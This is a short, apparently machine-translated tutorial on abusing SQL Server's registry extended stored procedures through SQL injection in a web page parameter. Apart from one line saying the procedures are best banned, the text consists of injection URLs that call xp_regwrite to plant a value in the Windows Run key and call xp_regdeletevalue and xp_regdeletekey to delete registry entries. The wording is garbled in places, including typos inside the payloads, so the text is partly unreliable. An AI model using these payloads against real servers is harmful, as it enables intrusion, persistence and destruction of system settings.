SQL Server contains several extended stored procedures that can access the system registry. But in fact these extended stored procedures are undisclosed, from SQL Server 7.0, still retain in SQL Server 2000, they may Will delete. But these stored procedures provide the ability to access the system registry in the current SQL Server version, and many people use SQL Server to attack the system, often use these extended stored procedures. So It is best to ban them in SQL Server. Http://127.0.0.1/view.asp?id=165 There is a SQL injection of MSSQL, then XP_REGWRITE is written to the registry usage: XP_REGWRITE Root button, subkey, value name, value Type, value http://127.0.0.1/view.asp?id=165 ;ec master.dbo.xp_regwrite 'hkey_local_machine', 'Software / Microsoft / Windows / CurrentVersion / Run', 'TestValuename', 'REG_SZ', ' Hello 'Note Types There are 2 reg_sz represent characters, and REG_DWORD represents integer.
xp_regdeletevalue delete a value Usage: xp_regdeletevalue root key, sub key value name http://127.0.0.1/view.asp?id=165;exec master.xp_regdeletevalue 'HKEY_LOCAL_MACHINE', 'SOFTWARE / Microsoft / Windows / CurrentVersion' , 'TestValuename'
XP_REGDELETEKEY Delete key, including all values under this key
How to use: http://127.0.0.1/view.asp?id=165 ;exec master.xp_regdeletekey 'hkey_local_machine', 'Software / Microsoft / Windows / CurrentVersion / TestKey'
